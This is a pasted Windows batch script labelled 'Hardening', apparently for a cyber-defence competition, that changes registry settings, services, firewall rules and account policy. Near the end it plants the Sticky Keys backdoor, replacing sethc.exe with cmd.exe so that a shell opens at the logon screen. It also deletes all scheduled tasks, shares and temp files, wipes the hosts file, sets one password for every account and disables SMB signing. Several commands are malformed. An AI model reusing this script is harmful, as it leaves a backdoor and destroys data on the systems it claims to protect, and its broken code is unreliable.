API tools faq
paste
Advertisement
Guest User

Hardening

a guest
Nov 17th, 2018
102
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.37 KB | None | 0 0
raw download clone embed print report
  1. @echo off
  2. color 0f
  3. cls
  4. :admnchk
  5. echo Immediately checking for Administrative access
  6. net sessions
  7. if %errorlevel%==0 (
  8. echo Yay you have Admin u no how2windows GG
  9. goto :adminhop
  10. ) else (
  11. echo Lol u r bad
  12. echo N0 Adm1n n00b!
  13. pause
  14. exit
  15. )
  16. :adminhop
  17. REM Turns on UAC
  18. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
  19. REM Turns off RDP
  20. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
  21. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  22.  
  23. REM Failsafe
  24. if %errorlevel%==1 netsh advfirewall firewall set service type = remotedesktop mode = disable
  25. REM Windows auomatic updates
  26. reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v AUOptions /t REG_DWORD /d 3 /f
  27.  
  28.  
  29. echo Cleaning out the DNS cache...
  30. ipconfig /flushdns
  31. echo Writing over the hosts file...
  32. attrib -r -s C:\WINDOWS\system32\drivers\etc\hosts
  33. echo > C:\Windows\System32\drivers\etc\hosts
  34. if %errorlevel%==1 echo There was an error in writing to the hosts file (not running this as Admin probably)
  35. REM Services
  36. echo Showing you the services...
  37. net start
  38. echo Now writing services to a file and searching for vulnerable services...
  39. net start > servicesstarted.txt
  40. echo This is only common services, not nessecarily going to catch 100%
  41. REM looks to see if remote registry is on
  42. net start | findstr Remote Registry
  43. if %errorlevel%==0 (
  44. echo Remote Registry is running!
  45. echo Attempting to stop...
  46. net stop RemoteRegistry
  47. sc config RemoteRegistry start=disabled
  48. if %errorlevel%==1 echo Stop failed... sorry...
  49. ) else (
  50. echo Remote Registry is already indicating stopped.
  51. )
  52. REM Remove all saved credentials
  53. cmdkey.exe /list > "%TEMP%\List.txt"
  54. findstr.exe Target "%TEMP%\List.txt" > "%TEMP%\tokensonly.txt"
  55. FOR /F "tokens=1,2 delims= " %%G IN (%TEMP%\tokensonly.txt) DO cmdkey.exe /delete:%%H
  56. del "%TEMP%\*.*" /s /f /q
  57.  
  58.  
  59. REM looks to see if remote access is on
  60. set SRVC_LIST=(RemoteAccess Telephony tlntsvr p2pimsvc simptcp fax msftpsvc)
  61. for %%i in %HITHERE% do net stop %%i
  62. for %%i in %HITHERE% sc config %%i start= disabled
  63. REM Rouge User Portion deleted.... disabling code because it's lame as hell....
  64. REM net users
  65. REM echo Would you like to delete a username?
  66. REM set /p ynuser=Y or N?
  67. REM if %ynuser%==Y (
  68. REM set /p deluser=Enter a user to delete:
  69. REM if %deluser%=="CYBERNEXS" echo DO NOT DELETE CYBERNEXS. IT WILL DISCONNNECT TO SAIC.
  70. REM if %deluser%=="CYBERNEXS" goto :deletion
  71. REM net user %deluser% /delete
  72. REM if %errorlevel%==0 echo Deletion succcessful.
  73. REM goto :deletion
  74. REM ) else (
  75. REM echo K. Moving on.
  76. REM )
  77.  
  78. REM Guest Account is deactivating
  79. net user Guest | findstr Active | findstr Yes
  80. if %errorlevel%==0 echo Guest account is active, deactivating
  81. if %errorlevel%==1 echo Guest account is not active, checking default admin account
  82. net user Guest /active:NO
  83. REM Rename Guest Account
  84. wmic useraccount where name='Guest' rename baconsweggur
  85. REM Make sure you are not on the administrator account before you deactive administrator account
  86. echo Making sure you are not on the default admin account...
  87. net user | findstr Administrator
  88. if %errorlevel%==0 (
  89. echo "Administrator" account exists
  90. echo Looking to see if you are on it
  91. if "%username%"=="Administrator" (
  92. echo Awkward, you ARE the Administrator account
  93. goto :skipcode
  94. )
  95. net user Administrator /active:NO
  96. )
  97. :skipcode
  98. set /p newpwd=Enter a new password for your accounts:
  99. net users > userlist.txt
  100. (
  101. for /F %%h in (userlist.txt) do (
  102. echo %%h | findstr NEXS
  103. if %errorlevel%==1 net user %%h %newpwd% >> userlist.txt
  104. )
  105. )
  106.  
  107. REM Now on to the firewall. Disables common rules.
  108. netsh advfirewall firewall set rule name="Remote Assistance (DCOM-In)" new enable=no >NUL
  109. netsh advfirewall firewall set rule name="Remote Assistance (PNRP-In)" new enable=no >NUL
  110. netsh advfirewall firewall set rule name="Remote Assistance (RA Server TCP-In)" new enable=no >NUL
  111. netsh advfirewall firewall set rule name="Remote Assistance (SSDP TCP-In)" new enable=no >NUL
  112. netsh advfirewall firewall set rule name="Remote Assistance (SSDP UDP-In)" new enable=no >NUL
  113. netsh advfirewall firewall set rule name="Remote Assistance (TCP-In)" new enable=no >NUL
  114. netsh advfirewall firewall set rule name="Telnet Server" new enable=no >NUL
  115. netsh advfirewall firewall set rule name="netcat" new enable=no >NUL
  116.  
  117. REM Disabling Windows Features
  118. REM Assuming they are on, if they aren't then boo-who
  119. dism /online /disable-feature /featurename:IIS-WebServerRole >NUL
  120. dism /online /disable-feature /featurename:IIS-WebServer >NUL
  121. dism /online /disable-feature /featurename:IIS-CommonHttpFeatures >NUL
  122. dism /online /disable-feature /featurename:IIS-HttpErrors >NUL
  123. dism /online /disable-feature /featurename:IIS-HttpRedirect >NUL
  124. dism /online /disable-feature /featurename:IIS-ApplicationDevelopment >NUL
  125. dism /online /disable-feature /featurename:IIS-NetFxExtensibility >NUL
  126. dism /online /disable-feature /featurename:IIS-NetFxExtensibility45 >NUL
  127. dism /online /disable-feature /featurename:IIS-HealthAndDiagnostics >NUL
  128. dism /online /disable-feature /featurename:IIS-HttpLogging >NUL
  129. dism /online /disable-feature /featurename:IIS-LoggingLibraries >NUL
  130. dism /online /disable-feature /featurename:IIS-RequestMonitor >NUL
  131. dism /online /disable-feature /featurename:IIS-HttpTracing >NUL
  132. dism /online /disable-feature /featurename:IIS-Security >NUL
  133. dism /online /disable-feature /featurename:IIS-URLAuthorization >NUL
  134. dism /online /disable-feature /featurename:IIS-RequestFiltering >NUL
  135. dism /online /disable-feature /featurename:IIS-IPSecurity >NUL
  136. dism /online /disable-feature /featurename:IIS-Performance >NUL
  137. dism /online /disable-feature /featurename:IIS-HttpCompressionDynamic >NUL
  138. dism /online /disable-feature /featurename:IIS-WebServerManagementTools >NUL
  139. dism /online /disable-feature /featurename:IIS-ManagementScriptingTools >NUL
  140. dism /online /disable-feature /featurename:IIS-IIS6ManagementCompatibility >NUL
  141. dism /online /disable-feature /featurename:IIS-Metabase >NUL
  142. dism /online /disable-feature /featurename:IIS-HostableWebCore >NUL
  143. dism /online /disable-feature /featurename:IIS-StaticContent >NUL
  144. dism /online /disable-feature /featurename:IIS-DefaultDocument >NUL
  145. dism /online /disable-feature /featurename:IIS-DirectoryBrowsing >NUL
  146. dism /online /disable-feature /featurename:IIS-WebDAV >NUL
  147. dism /online /disable-feature /featurename:IIS-WebSockets >NUL
  148. dism /online /disable-feature /featurename:IIS-ApplicationInit >NUL
  149. dism /online /disable-feature /featurename:IIS-ASPNET >NUL
  150. dism /online /disable-feature /featurename:IIS-ASPNET45 >NUL
  151. dism /online /disable-feature /featurename:IIS-ASP >NUL
  152. dism /online /disable-feature /featurename:IIS-CGI >NUL
  153. dism /online /disable-feature /featurename:IIS-ISAPIExtensions >NUL
  154. dism /online /disable-feature /featurename:IIS-ISAPIFilter >NUL
  155. dism /online /disable-feature /featurename:IIS-ServerSideIncludes >NUL
  156. dism /online /disable-feature /featurename:IIS-CustomLogging >NUL
  157. dism /online /disable-feature /featurename:IIS-BasicAuthentication >NUL
  158. dism /online /disable-feature /featurename:IIS-HttpCompressionStatic >NUL
  159. dism /online /disable-feature /featurename:IIS-ManagementConsole >NUL
  160. dism /online /disable-feature /featurename:IIS-ManagementService >NUL
  161. dism /online /disable-feature /featurename:IIS-WMICompatibility >NUL
  162. dism /online /disable-feature /featurename:IIS-LegacyScripts >NUL
  163. dism /online /disable-feature /featurename:IIS-LegacySnapIn >NUL
  164. dism /online /disable-feature /featurename:IIS-FTPServer >NUL
  165. dism /online /disable-feature /featurename:IIS-FTPSvc >NUL
  166. dism /online /disable-feature /featurename:IIS-FTPExtensibility >NUL
  167. dism /online /disable-feature /featurename:TFTP >NUL
  168. dism /online /disable-feature /featurename:TelnetClient >NUL
  169. dism /online /disable-feature /featurename:TelnetServer >NUL
  170.  
  171. REM now on to the power settings
  172. REM use commands as vague as possible to set a require password on wakeup
  173. REM assumes its a laptop, which is silly
  174. powercfg -SETDCVALUEINDEX SCHEME_BALANCED SUB_NONE CONSOLELOCK 1
  175. powercfg -SETACVALUEINDEX SCHEME_BALANCED SUB_NONE CONSOLELOCK 1
  176. powercfg -SETDCVALUEINDEX SCHEME_MIN SUB_NONE CONSOLELOCK 1
  177. powercfg -SETDCVALUEINDEX SCHEME_MIN SUB_NONE CONSOLELOCK 1
  178. powercfg -SETDCVALUEINDEX SCHEME_MAX SUB_NONE CONSOLELOCK 1
  179. powercfg -SETDCVALUEINDEX SCHEME_MAX SUB_NONE CONSOLELOCK 1
  180.  
  181. REM Automatically delete all network shares that are 1 word or less cause I have no system for
  182. net share > sharelist.txt
  183. (
  184. for /F %%h in (sharelist.txt) do (
  185. net share /delete %%h >> deletedsharelist.txt
  186. )
  187. )
  188. pause
  189. REM Common Policies
  190. REM Restrict CD ROM drive
  191. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateCDRoms /t REG_DWORD /d 1 /f
  192. REM Automatic Admin logon
  193. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 0 /f
  194. REM Logo message text
  195. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "Lol noobz pl0x don't hax, thx bae"
  196. REM Logon message title bar
  197. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "Dnt hax me"
  198. REM Wipe page file from shutdown
  199. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v ClearPageFileAtShutdown /t REG_DWORD /d 1 /f
  200. REM LOL this is a key? Disallow remote access to floppie disks
  201. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateFloppies /t REG_DWORD /d 1 /f
  202. REM Prevent print driver installs
  203. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers" /v AddPrinterDrivers /t REG_DWORD /d 1 /f
  204. REM Limit local account use of blank passwords to console
  205. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 1 /f
  206. REM Auditing access of Global System Objects
  207. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v auditbaseobjects /t REG_DWORD /d 1 /f
  208. REM Auditing Backup and Restore
  209. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v fullprivilegeauditing /t REG_DWORD /d 1 /f
  210. REM Do not display last user on logon
  211. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 1 /f
  212. REM UAC setting (Prompt on Secure Desktop)
  213. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t REG_DWORD /d 1 /f
  214. REM Enable Installer Detection
  215. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 1 /f
  216. REM Undock without logon
  217. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v undockwithoutlogon /t REG_DWORD /d 0 /f
  218. REM Maximum Machine Password Age
  219. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v MaximumPasswordAge /t REG_DWORD /d 15 /f
  220. REM Disable machine account password changes
  221. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v DisablePasswordChange /t REG_DWORD /d 1 /f
  222. REM Require Strong Session Key
  223. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireStrongKey /t REG_DWORD /d 1 /f
  224. REM Require Sign/Seal
  225. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireSignOrSeal /t REG_DWORD /d 1 /f
  226. REM Sign Channel
  227. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SignSecureChannel /t REG_DWORD /d 1 /f
  228. REM Seal Channel
  229. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SealSecureChannel /t REG_DWORD /d 1 /f
  230. REM Don't disable CTRL+ALT+DEL even though it serves no purpose
  231. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCAD /t REG_DWORD /d 0 /f
  232. REM Restrict Anonymous Enumeration #1
  233. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_DWORD /d 1 /f
  234. REM Restrict Anonymous Enumeration #2
  235. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymoussam /t REG_DWORD /d 1 /f
  236. REM Idle Time Limit - 45 mins
  237. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v autodisconnect /t REG_DWORD /d 45 /f
  238. REM Require Security Signature - Disabled pursuant to checklist
  239. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v enablesecuritysignature /t REG_DWORD /d 0 /f
  240. REM Enable Security Signature - Disabled pursuant to checklist
  241. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v requiresecuritysignature /t REG_DWORD /d 0 /f
  242. REM Disable Domain Credential Storage
  243. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v disabledomaincreds /t REG_DWORD /d 1 /f
  244. REM Don't Give Anons Everyone Permissions
  245. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v everyoneincludesanonymous /t REG_DWORD /d 0 /f
  246. REM SMB Passwords unencrypted to third party? How bout nah
  247. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanWorkstation\Parameters /v EnablePlainTextPassword /t REG_DWORD /d 0 /f
  248. REM Null Session Pipes Cleared
  249. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionPipes /t REG_MULTI_SZ /d "" /f
  250. REM Remotely accessible registry paths cleared
  251. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedExactPaths /v Machine /t REG_MULTI_SZ /d "" /f
  252. REM Remotely accessible registry paths and sub-paths cleared
  253. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths /v Machine /t REG_MULTI_SZ /d "" /f
  254. REM Restict anonymous access to named pipes and shares
  255. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionShares /t REG_MULTI_SZ /d "" /f
  256. REM Allow to use Machine ID for NTLM
  257. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v UseMachineId /t REG_DWORD /d 0 /f
  258.  
  259. REM Internet Explorer
  260. REM Smart Screen for IE8
  261. reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV8 /t REG_DWORD /d 1 /f
  262. REM Smart Screen for IE9+
  263. reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1 /f
  264.  
  265. REM Windows Explorer Settings
  266. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
  267. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 1 /f
  268. REM Disable Dump file creation
  269. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /v CrashDumpEnabled /t REG_DWORD /d 0 /f
  270. REM Disable Autorun
  271. reg ADD HKCU\SYSTEM\CurrentControlSet\Services\CDROM /v AutoRun /t REG_DWORD /d 1 /f
  272.  
  273. REM Disabled Internet Explorer Password Caching
  274. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisablePasswordCaching /t REG_DWORD /d 1 /f
  275.  
  276. REM Internet Explorer Settings
  277.  
  278. REM Enable Do Not Track
  279. reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DoNotTrack /t REG_DWORD /d 1 /f
  280. reg ADD "HKCU\Software\Microsoft\Internet Explorer\Download" /v RunInvalidSignatures /t REG_DWORD /d 1 /f
  281. reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings" /v LOCALMACHINE_CD_UNLOCK /t REG_DWORD /d 1 /t
  282. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonBadCertRecving /t REG_DWORD /d /1 /f
  283. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnOnPostRedirect /t REG_DWORD /d 1 /f
  284. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonZoneCrossing /t REG_DWORD /d 1 /f
  285.  
  286. REM account password policy set
  287. echo New requirements are being set for your passwords
  288. net accounts /FORCELOGOFF:30 /MINPWLEN:8 /MAXPWAGE:30 /MINPWAGE:10 /UNIQUEPW:3
  289. echo New password policy:
  290. echo Force log off after 30 minutes
  291. echo Minimum password length of 8 characters
  292. echo Maximum password age of 30
  293. echo Minimum password age of 10
  294. echo Unique password threshold set to 3 (default is 5)
  295. pause
  296. REM Delete system tasks
  297. schtasks /Delete /TN *
  298.  
  299. REM Integrated Stick Keys
  300. REM Give permissions needed
  301. takeown /f cmd.exe >NUL
  302. takeown /f sethc.exe >NUL
  303. icacls cmd.exe /grant %username%:F >NUL
  304. icacls sethc.exe /grant %username%:F >NUL
  305. REM Renaming and stuff
  306. move sethc.exe sethc.old.exe
  307. copy cmd.exe sethc.exe
  308. echo Stick Keys exploit triggered
  309.  
  310. REM Saved Credentials
  311.  
  312.  
  313. REM Auditing Policy
  314. auditpol /set /category:* /success:enable
  315. auditpol /set /category:* /failure:enable
  316. REM system verification
  317. sfc /verifyonly
  318. pause
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!